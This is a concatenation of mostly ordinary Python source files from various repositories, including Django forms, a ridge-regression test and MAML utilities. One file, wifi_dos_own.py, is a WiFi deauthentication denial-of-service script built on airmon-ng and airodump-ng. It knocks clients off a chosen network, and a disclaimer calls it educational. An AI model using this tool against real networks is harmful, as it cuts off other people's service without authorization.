# go until we reply outside of the corpus, or the current tweet isn't a reply
while root_id in tweet_map and 'in_reply_to_status_id_str' in tweet_map[root_id] and tweet_map[root_id]['in_reply_to_status_id_str']:
root_id = tweet_map[root_id]['in_reply_to_status_id_str']
return root_id
USER_FEATURES = [
'U_tweet_count',
'U_retweet_count',
'U_reply_count',
'U_tweet_rate',
'U_mentioned_ids', # unique IDs
'U_mention_count', # every mention
'U_unique_hts', # unique hashtags
'U_ht_count', # every hashtag
'U_unique_urls', # unique hashtags
'U_url_count', # every hashtag
'U_default_img',
'U_desc_len',
'U_url'
]
DEFAULT_PROF_IMG_URL = 'http://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png'
COMMUNITY_FEATURES = [
'C_tweet_count',
'C_node_count',
'C_edge_count',
'C_user_count',
'C_author_count',
'C_hashtag_count',
'C_url_count',
'C_repost_count',
'C_quote_count',
'C_mention_count',
'C_reply_count',
'C_use_ht_count',
'C_use_url_count',
'C_in_conv_count',
'C_in/ext_repost',
'C_in/ext_mention',
'C_in/ext_reply',
]
DEBUG=False
if __name__ == '__main__':
options = Options()
opts = options.parse(sys.argv[1:])
DEBUG=opts.verbose
users = {}
communities = defaultdict(lambda: [], {})
with open(opts.ids_file, 'r', encoding='utf-8') as f:
csv_reader = csv.DictReader(f, delimiter=',', quotechar='"')
for row in csv_reader:
r = {}
for key in row: # range(len(row)):
r[key] = row[key]
users[r['node_id']] = r
communities[r['community_id']].append(r['node_id'])
# users[r[0]] = r
tweets = dict([(uid, []) for uid in users.keys()])
earliest_ts = sys.maxsize
latest_ts = 0
# with open(opts.tweets_file, 'r', encoding='utf-8') as f:
f = gzip.open(opts.tweets_file, 'rt') if opts.tweets_file[-1] in 'zZ' else open(opts.tweets_file, 'r', encoding='utf-8')
for l in f:
tweet = json.loads(l.strip())
tweet['ts'] = utils.extract_ts_s(tweet['created_at']) # timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
if tweet['ts'] < earliest_ts: earliest_ts = tweet['ts']
if tweet['ts'] > latest_ts: latest_ts = tweet['ts']
user_id = tweet['user']['id_str']
if user_id in users.keys():
# tweet['ts'] = timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
tweets[user_id].append(tweet)
f.close()
collection_period_mins = (latest_ts - earliest_ts) / 60
user_feature_vectors = {}
for user_id in tweets:
tweets[user_id].sort(key=lambda t: t['ts'])
user_feature_vectors[user_id] = build_user_feature_vector(user_id, tweets[user_id], collection_period_mins)
community_feature_vectors = {}
for community_id in communities:
community_tweets = {}
community = communities[community_id]
for user_id in community:
for t in tweets[user_id]:
community_tweets[t['id_str']] = t
# community_tweets += tweets[user_id]
# community_tweets.sort(key=lambda t: t['ts'])
# build activity graph from tweets
g = build_activity_graph(community_tweets, earliest_ts)
# build feature vector from activity graph
community_feature_vectors[community_id] = build_community_feature_vector(community, g)
header = ','.join(map(str, ['Label'] + USER_FEATURES + ['U_prop_hcc_degree', 'community_id'] + COMMUNITY_FEATURES))
print(header)
for user_id in tweets:
user_vector = user_feature_vectors[user_id]
hcc_prop_degree = users[user_id]['proportional_degree']
community_id = users[user_id]['community_id']
community_vector = community_feature_vectors[community_id]
print(','.join([
opts.label,
mk_feature_str(USER_FEATURES, user_vector),
hcc_prop_degree,
community_id,
mk_feature_str(COMMUNITY_FEATURES, community_vector)
]))
# print('%s: %s %s' % (user_id, str(user_feature_vectors[user_id]), str()))
| 43.836461 | 153 | 0.633906 |
c0556573b1b396000e337b73f3de0c54b4d2d005 | 374 | py | Python | src/viewer/abs/forms.py | ozacas/asxtrade | a3645ae526bfc7a546fdf2a39520feda99e3390a | [
"Apache-2.0"
] | 8 | 2021-03-20T13:12:25.000Z | 2022-02-07T11:17:40.000Z | src/viewer/abs/forms.py | ozacas/asxtrade | a3645ae526bfc7a546fdf2a39520feda99e3390a | [
"Apache-2.0"
] | 8 | 2021-03-07T03:23:46.000Z | 2021-06-01T10:49:56.000Z | src/viewer/abs/forms.py | ozacas/asxtrade | a3645ae526bfc7a546fdf2a39520feda99e3390a | [
"Apache-2.0"
] | 3 | 2020-12-08T10:22:23.000Z | 2021-08-04T01:59:24.000Z | from django import forms
from django.core.exceptions import ValidationError
from abs.models import dataflows
| 31.166667 | 83 | 0.71123 |
c058a47a9fcf9cced343a8955317d5594bcf17a7 | 734 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 1 | 2022-01-16T10:00:24.000Z | 2022-01-16T10:00:24.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | # Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
# Logger
log = logging.getLogger(__name__)
def clear_access_session_intf(device, intf):
""" clear access-session interface {}
Args:
device (`obj`): Device object
intf('str'): Name of the interface to clear access-session
Returns:
None
Raises:
SubCommandFailure
"""
try:
device.execute('clear access-session interface {intf}'.format(intf=intf))
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not clear access-session interface on {device}. Error:\n{error}"
.format(device=device, error=e)
)
| 24.466667 | 83 | 0.622616 |
c059b518fc62b90809941f99c3bd5f94aa341ed5 | 9,713 | py | Python | pipeline/forms.py | jnis77diver/django-pipeline | 8bac57adae84615d9d79ad19b2b591c2e46879f9 | [
"MIT"
] | null | null | null | pipeline/forms.py | jnis77diver/django-pipeline | 8bac57adae84615d9d79ad19b2b591c2e46879f9 | [
"MIT"
] | 1 | 2021-09-20T22:02:21.000Z | 2021-09-21T13:55:41.000Z | pipeline/forms.py | jnis77diver/django-pipeline | 8bac57adae84615d9d79ad19b2b591c2e46879f9 | [
"MIT"
] | 1 | 2021-09-18T01:39:48.000Z | 2021-09-18T01:39:48.000Z | """Support for referencing Pipeline packages in forms and widgets."""
from __future__ import unicode_literals
from django.contrib.staticfiles.storage import staticfiles_storage
from django.utils.functional import cached_property
try:
from django.utils.six import iteritems, add_metaclass
except ImportError:
from .decorator import add_metaclass
from .collector import default_collector
from .conf import settings
from .packager import Packager
| 34.81362 | 79 | 0.615258 |
c05cbafe5128e838bdc6f0435f143a4bec7be43b | 1,838 | py | Python | api_user/views.py | archkwon/python-django-restful-mysql | a8097c08057de9656cb40266420fcffebb11bdb6 | [
"MIT"
] | null | null | null | api_user/views.py | archkwon/python-django-restful-mysql | a8097c08057de9656cb40266420fcffebb11bdb6 | [
"MIT"
] | null | null | null | api_user/views.py | archkwon/python-django-restful-mysql | a8097c08057de9656cb40266420fcffebb11bdb6 | [
"MIT"
] | null | null | null | from django.http import QueryDict
from django.http.response import JsonResponse
from rest_framework import viewsets, status
from rest_framework.views import APIView
from .serializers import *
# | 31.152542 | 72 | 0.650707 |
c05d4625afeae008646d224702597baba51c509c | 5,043 | py | Python | vms/create_kit_files.py | vmssoftware/python_3_8_2 | 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81 | [
"CNRI-Python-GPL-Compatible"
] | 3 | 2020-11-30T22:36:38.000Z | 2021-01-22T01:00:06.000Z | vms/create_kit_files.py | vmssoftware/python_3_8_2 | 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | vms/create_kit_files.py | vmssoftware/python_3_8_2 | 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81 | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2021-04-13T13:17:02.000Z | 2021-04-13T13:17:02.000Z | import os
import re
import sys
if __name__ == "__main__":
import getopt
import datetime
opts, args = getopt.getopt(sys.argv[1:], '', ['type=', 'major=', 'minor=', 'level=', 'edit='])
type = 'F'
major = '3'
minor = '8'
level = '2'
edit = '' # 'd' + datetime.date.today().strftime('%Y%m%d')
for opt, optarg in opts:
if opt in ['--type']:
type = optarg
elif opt in ['--major']:
major = optarg
elif opt in ['--minor']:
minor = optarg
elif opt in ['--level']:
level = optarg
elif opt in ['--edit']:
edit = optarg
else:
print('Unknown option %s' % opt)
create_content(
type,
major,
minor,
level,
edit,
)
| 26.265625 | 120 | 0.601229 |
c05de0c488b3f0907732a9cffd73ea481b5c0be6 | 10,458 | py | Python | dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 0984ade31ecfcd003e1cce4f165fcd717e9b6317 | [
"WTFPL"
] | 4 | 2016-06-19T20:02:12.000Z | 2017-02-27T19:55:49.000Z | dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 0984ade31ecfcd003e1cce4f165fcd717e9b6317 | [
"WTFPL"
] | 6 | 2016-01-20T20:24:42.000Z | 2016-08-17T02:31:43.000Z | dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 0984ade31ecfcd003e1cce4f165fcd717e9b6317 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python
# .py
# @TODO:
# - fix the diffing
# - use rsync across hosts or something fancy
import argparse, difflib, functools, re, shutil, subprocess, sys, time, os
from pprint import pprint
__description__ = "Manage your dotfiles."
ls = lambda path: os.listdir(path)
ls_abs = lambda path: [os.path.join(path, x) for x in os.listdir(path)]
ln = lambda src, dst: os.symlink(src, dst)
unlink = lambda src: os.unlink(src)
#
# dotfiles command API
#
#
# main
#
if __name__ == '__main__':
status = main()
sys.exit(status)
| 34.288525 | 104 | 0.52467 |
c05e6da89d714cfca87531c2eed521c2ad804f17 | 246 | py | Python | plot_log_population.py | catskillsresearch/openasr20 | b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e | [
"Apache-2.0"
] | null | null | null | plot_log_population.py | catskillsresearch/openasr20 | b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e | [
"Apache-2.0"
] | null | null | null | plot_log_population.py | catskillsresearch/openasr20 | b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e | [
"Apache-2.0"
] | 1 | 2021-07-28T02:13:21.000Z | 2021-07-28T02:13:21.000Z | import matplotlib.pylab as plt
| 24.6 | 69 | 0.707317 |
c05e9891a35e2b972d23578bd72644f77e52bb11 | 12,711 | py | Python | src/stargazer/stargazer.py | magazino/stargazer | d350959b830b084d31656682721f68b22683ceba | [
"MIT"
] | 1 | 2020-02-16T13:18:39.000Z | 2020-02-16T13:18:39.000Z | src/stargazer/stargazer.py | magazino/stargazer | d350959b830b084d31656682721f68b22683ceba | [
"MIT"
] | 3 | 2017-11-10T14:06:05.000Z | 2020-04-10T08:27:00.000Z | src/stargazer/stargazer.py | magazino/stargazer | d350959b830b084d31656682721f68b22683ceba | [
"MIT"
] | null | null | null | """
Driver class for Hagisonic Stargazer, with no ROS dependencies.
"""
from serial import Serial
from collections import deque
import re
import yaml
import time
import logging
import rospy
import numpy as np
from threading import Thread, Event
from tf import transformations
# STX: char that represents the start of a properly formed message
STX = '~'
# ETX: char that represents the end of a properly formed message
ETX = '`'
# DELIM: char that splits data
DELIM = '|'
# CMD: char that indicates command
CMD = '#'
# CMD: char that indicates command
RESPONSE = '!'
# RESULT: char that indicates that the message contains result data
RESULT = '^'
# NOTIFY: char that indicates a notification message of some kind
NOTIFY = '*'
def local_to_global(marker_map, local_poses):
"""
Transform local marker coordinates to map coordinates.
"""
global_poses = dict()
unknown_ids = set()
for _id, pose in local_poses.iteritems():
if _id in marker_map:
marker_to_map = marker_map[_id]
local_to_marker = np.linalg.inv(pose)
local_to_map = np.dot(marker_to_map, local_to_marker)
global_poses[_id] = local_to_map
else:
unknown_ids.add(_id)
return global_poses, unknown_ids
def fourdof_to_matrix(translation, yaw):
"""
Convert from a Cartesian translation and yaw to a homogeneous transform.
"""
T = transformations.rotation_matrix(yaw, [0,0,1])
T[0:3,3] = translation
return T
| 33.274869 | 131 | 0.567855 |
c06110be42afdd7912f3230ce0bb253e62f06b14 | 107 | py | Python | example.py | karishmashuklaa/flatifyLists | af9c1cfc45c29756ff9e285dba65f3b4909dabab | [
"MIT"
] | null | null | null | example.py | karishmashuklaa/flatifyLists | af9c1cfc45c29756ff9e285dba65f3b4909dabab | [
"MIT"
] | null | null | null | example.py | karishmashuklaa/flatifyLists | af9c1cfc45c29756ff9e285dba65f3b4909dabab | [
"MIT"
] | null | null | null | from flatifylists import flatifyList
example = [[[1,2], [3,[4,[5],6],7],8,9]]
print(flatifyList(example)) | 21.4 | 40 | 0.672897 |
c0619baa743809ca6b4e84726f67140652acbe34 | 834 | py | Python | pympeg/_probe.py | AP-Atul/pympeg | 26d18883d528ce73c09982f61440d170661165ae | [
"Unlicense"
] | 5 | 2021-01-18T03:19:32.000Z | 2021-04-27T06:58:41.000Z | pympeg/_probe.py | AP-Atul/pympeg | 26d18883d528ce73c09982f61440d170661165ae | [
"Unlicense"
] | null | null | null | pympeg/_probe.py | AP-Atul/pympeg | 26d18883d528ce73c09982f61440d170661165ae | [
"Unlicense"
] | null | null | null | import os
import json
import subprocess
from ._exceptions import ProbeException
__all__ = ['probe']
def probe(filename, cmd='ffprobe', timeout=None):
"""Runs the ffprobe on the given file and outputs in json format """
if not os.path.isfile(filename):
raise FileExistsError(f"Input file {filename} does not exists.")
args = [cmd, '-show_format', '-show_streams', '-of', 'json']
args += [filename]
p = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
communicate_kwargs = dict()
if timeout is not None:
communicate_kwargs['timeout'] = timeout
out, err = p.communicate(**communicate_kwargs)
if p.returncode != 0:
raise ProbeException('ffprobe', out, err)
return json.loads(out.decode('utf-8'))
| 24.529412 | 72 | 0.640288 |
c063c02a86fbd38bc9d19422a9222b6d2583e226 | 252 | py | Python | example/func_doc.py | tinashime/Python27 | b632918c7368a9bcfc5af8353e136247d954fb5e | [
"bzip2-1.0.6"
] | null | null | null | example/func_doc.py | tinashime/Python27 | b632918c7368a9bcfc5af8353e136247d954fb5e | [
"bzip2-1.0.6"
] | null | null | null | example/func_doc.py | tinashime/Python27 | b632918c7368a9bcfc5af8353e136247d954fb5e | [
"bzip2-1.0.6"
] | null | null | null | def printMax(x,y):
'''prints the maximum of two numbers.
The two values must be integers.'''
x = int(x)
y = int(y)
if x > y:
print x,'is maximun'
else:
print y,'is maximum'
printMax(3,5)
print printMax.__doc__
| 18 | 41 | 0.575397 |
c064dd6092bc97df5e3082e40d12bf519228fd1e | 16,602 | py | Python | wifi_dos_own.py | Mr-Cracker-Pro/red-python-scripts | 5bead83038aadf53fc868fb9a786cb37824b18eb | [
"MIT"
] | 1,353 | 2021-01-07T17:12:01.000Z | 2022-03-31T21:30:38.000Z | wifi_dos_own.py | deepahir/red-python-scripts | 5deef698bf505de30735120e7c3bab34707ad32c | [
"MIT"
] | 29 | 2021-01-30T21:12:16.000Z | 2022-03-04T15:06:12.000Z | wifi_dos_own.py | deepahir/red-python-scripts | 5deef698bf505de30735120e7c3bab34707ad32c | [
"MIT"
] | 1,238 | 2021-01-07T17:05:18.000Z | 2022-03-31T23:25:04.000Z | #!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
# We use the subprocess.run to run the "sudo iw dev" command we'd normally run to find the network interfaces.
result = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
# Put WiFi controller into monitor mode.
# This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Killing conflicting processes makes sure that nothing interferes with putting controller into monitor mode.
subprocess.run(["airmon-ng", "check", "kill"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
# Bring the WiFi controller back online.
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
# Bands b and g are 2.4Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif choice == "1":
# Band a is for 5Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
# Will use bands a, b and g (actually band n). Checks full spectrum.
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We copy any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
# Regular Expressions to be used.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of David Bombal, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
# Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
macs_not_to_kick_off = mac_address_regex.findall(macs)
# We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
# If you entered a valid MAC Address the program flow will continue and break out of the while loop.
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
# Check if the choice exists. If it doesn't it asks the user to try again.
# We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
# Since the choice exists and is an integer we can cast band choice as an integer.
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
# If no networks interface controllers connected to your computer the program will exit.
print("Please connect a network interface controller and try again!")
exit()
# Select the network interface controller you want to put into monitor mode.
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
# We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
# Add all the active MAC Addresses.
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{item}")
# Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
if item not in threads_started:
# It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
threads_started.append(item)
# We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
# A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
| 50.1571 | 219 | 0.634743 |
c0668c5403b0ea8527a26c2985cb37df3eafd6d0 | 597 | py | Python | lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 7975688355fba8b0f8349dd55a1b6cb625c3efd0 | [
"MIT"
] | null | null | null | lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 7975688355fba8b0f8349dd55a1b6cb625c3efd0 | [
"MIT"
] | null | null | null | lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 7975688355fba8b0f8349dd55a1b6cb625c3efd0 | [
"MIT"
] | null | null | null | import subprocess
def get_gpu_memory_map():
'''
Keys are device ids as integers.
Values are memory usage as integers in MB.
'''
result = subprocess.check_output(
[
'nvidia-smi', '--query-gpu=memory.used',
'--format=csv,nounits,noheader'
], encoding='utf-8')
# Convert lines into a dictionary
gpu_memory = [int(x) for x in result.strip().split('\n')]
gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))
return gpu_memory_map
| 27.136364 | 66 | 0.631491 |
c066f48fe0ef8d58aa4b19024e03a53d9943e528 | 2,010 | py | Python | optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | fee0be214b393af2184d565eb1e9aebb4eb6eeec | [
"MIT"
] | null | null | null | optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | fee0be214b393af2184d565eb1e9aebb4eb6eeec | [
"MIT"
] | null | null | null | optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | fee0be214b393af2184d565eb1e9aebb4eb6eeec | [
"MIT"
] | null | null | null | import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
if __name__ == '__main__':
unittest.main(argv=argv)
| 30.923077 | 79 | 0.656716 |
c0670360313a88da7a90013e4063946791935b2d | 11,795 | py | Python | app/parking/views.py | zollf/CITS3200 | 95fb7569dad325c057e441cd7265d3e85735c058 | [
"CC0-1.0"
] | null | null | null | app/parking/views.py | zollf/CITS3200 | 95fb7569dad325c057e441cd7265d3e85735c058 | [
"CC0-1.0"
] | null | null | null | app/parking/views.py | zollf/CITS3200 | 95fb7569dad325c057e441cd7265d3e85735c058 | [
"CC0-1.0"
] | null | null | null | from django.shortcuts import redirect
from django.http.response import JsonResponse
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from rest_framework.parsers import JSONParser
from .models import CarPark, CarBay
from app.authentication.models import User
from .serializers import *
from ..emails.send import log_and_send_mail
| 36.292308 | 120 | 0.603815 |
c068ebb6bccce46da01fec0d1da4f714e0e2357e | 33,949 | py | Python | utils.py | eepLearning/learn2learn | 4ed48e69f1ca5c9508331e15fd4a8f65c3cae750 | [
"MIT"
] | null | null | null | utils.py | eepLearning/learn2learn | 4ed48e69f1ca5c9508331e15fd4a8f65c3cae750 | [
"MIT"
] | null | null | null | utils.py | eepLearning/learn2learn | 4ed48e69f1ca5c9508331e15fd4a8f65c3cae750 | [
"MIT"
] | null | null | null | import numpy as np
import torch
from torch.autograd import grad
from learn2learn.utils import clone_module, update_module
from torch import nn, optim
def maml_update(model, lr, grads=None):
"""
[[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/algorithms/maml.py)
**Description**
Performs a MAML update on model using grads and lr.
The function re-routes the Python object, thus avoiding in-place
operations.
NOTE: The model itself is updated in-place (no deepcopy), but the
parameters' tensors are not.
**Arguments**
* **model** (Module) - The model to update.
* **lr** (float) - The learning rate used to update the model.
* **grads** (list, *optional*, default=None) - A list of gradients for each parameter
of the model. If None, will use the gradients in .grad attributes.
**Example**
~~~python
maml = l2l.algorithms.MAML(Model(), lr=0.1)
model = maml.clone() # The next two lines essentially implement model.adapt(loss)
grads = autograd.grad(loss, model.parameters(), create_graph=True)
maml_update(model, lr=0.1, grads)
~~~
"""
if grads is not None:
params = list(model.parameters())
if not len(grads) == len(list(params)):
msg = 'WARNING:maml_update(): Parameters and gradients have different length. ('
